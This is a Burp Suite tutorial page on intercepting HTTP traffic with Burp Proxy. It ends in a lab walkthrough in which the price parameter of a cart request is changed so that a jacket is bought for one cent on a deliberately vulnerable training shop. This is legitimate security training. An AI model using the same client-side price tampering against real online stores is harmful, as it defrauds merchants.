PROFESSIONALCOMMUNITY

2. Intercept HTTP traffic with Burp Proxy

  • Last updated: September 9, 2021

  • Read time: 4 Minutes

In this tutorial, you'll use a live, deliberately vulnerable website to learn how to intercept and modify HTTP requests with Burp Proxy.

Intercepting a request

Burp Proxy lets you intercept HTTP requests and responses sent between your browser and the target server. This enables you to study how the website behaves when you perform different actions.

Step 1: Launch Burp's embedded browser

Go to the Proxy > Intercept tab and click Open Browser. This launches Burp's embedded Chromium browser, which is preconfigured to work with Burp right out of the box.

Position the windows so that you can see both Burp and the browser.

Opening Burp Suite's embedded browser

Step 2: Intercept a request

In Burp, notice that the Intercept is on button is selected.

Intercept is on

Using the embedded browser, try to visit https://portswigger.net and observe that the site doesn't load. Burp Proxy has intercepted the HTTP request that was issued by the browser before it could reach the server. You can see this intercepted request on the Proxy > Intercept tab.

Viewing an intercepted request in Burp Proxy

The request is held here so that you can study it, and even modify it, before forwarding it to the target server.

Step 3: Forward the request

Click the Forward button several times to send the intercepted request, and any subsequent ones, until the page loads in the browser.

Step 4: Switch off interception

Due to the number of requests browsers typically send, you often won't want to intercept every single one of them. Click the Intercept is on button so that it now says Intercept is off.

Proxy Intercept is off

Go back to the embedded browser and confirm that you can now interact with the site as normal.

Step 5: View the HTTP history

In Burp, go to the Proxy > HTTP history tab. Here, you can see the history of all HTTP traffic that has passed through Burp Proxy, even while interception was switched off.

Click on any entry in the history to view the raw HTTP request, along with the corresponding response from the server.

Viewing the HTTP history in Burp Proxy

This lets you explore the website as normal and study the interactions between your browser and the server afterwards, which is more convenient in many cases.


Modifying requests in Burp Proxy

In this section, you'll learn how to modify an intercepted request in Burp Proxy. This enables you to manipulate the request in ways that the website isn't expecting to see how it responds. Using one of our deliberately vulnerable websites, known as "labs", you'll see how this can help you identify and exploit real vulnerabilities.

Web Security Academy

To follow along, you'll need an account on portswigger.net. If you don't have one already, registration is free and it grants you full access to the Web Security Academy.

Step 1: Access the vulnerable website in the embedded browser

In Burp, go to the Proxy > Intercept tab and make sure interception is switched off.

Launch the embedded browser and use it to access the following URL, logging in if prompted:

https://portswigger.net/users?returnurl=/web-security/logic-flaws/examples/lab-logic-flaws-excessive-trust-in-client-side-controls

When the page loads, click Access the lab to launch your own instance of a fake shopping website. This may take a few seconds to load.

Lab home page

Step 2: Log in to your shopping account

On the shopping website, click My account and log in using the following credentials:

Username: wiener

Password: peter

Notice that you have just $100 of store credit.

Step 3: Find something to buy

Click Home to go back to the home page. Select the option to view the product details for the Lightweight "l33t" leather jacket.

Step 4: Study the add to cart function

In Burp, go to the Proxy > Intercept tab and switch interception back on. In the browser, add the leather jacket to your cart to intercept the resulting POST /cart request.

Study the add to cart function

Note

You may initially see a different request on the Proxy > Intercept tab if your browser is doing something else in the background. In this case, just click Forward until you see the POST /cart request as shown in the screenshot above.

Study the intercepted request and notice that there is a parameter in the body called price, which matches the price of the item in cents.

Step 5: Modify the request

Change the value of the price parameter to 1 and click Forward to send the modified request to the server.

Changing the price parameter

Switch interception off again so that any subsequent requests can pass through Burp Proxy uninterrupted.

Step 6: Exploit the vulnerability

In the embedded browser, click the basket icon in the upper-right corner to view your cart. Notice that the jacket has been added for just one cent.

Note

There is no way to modify the price via the web interface. You were only able to make this change thanks to Burp Proxy.

Click the Place order button to purchase the jacket for an extremely reasonable price.

Congratulations, you've also just solved your first Web Security Academy lab! You've also learned how to intercept, review, and manipulate HTTP traffic using Burp Proxy.

Next step - Reissuing requests with Burp Repeater

CONTINUE

In this tutorial

  1. Initial Installation
  2. Intercepting HTTP traffic with Burp Proxy
  3. Manually reissuing requests with Burp Repeater
  4. Running your first scan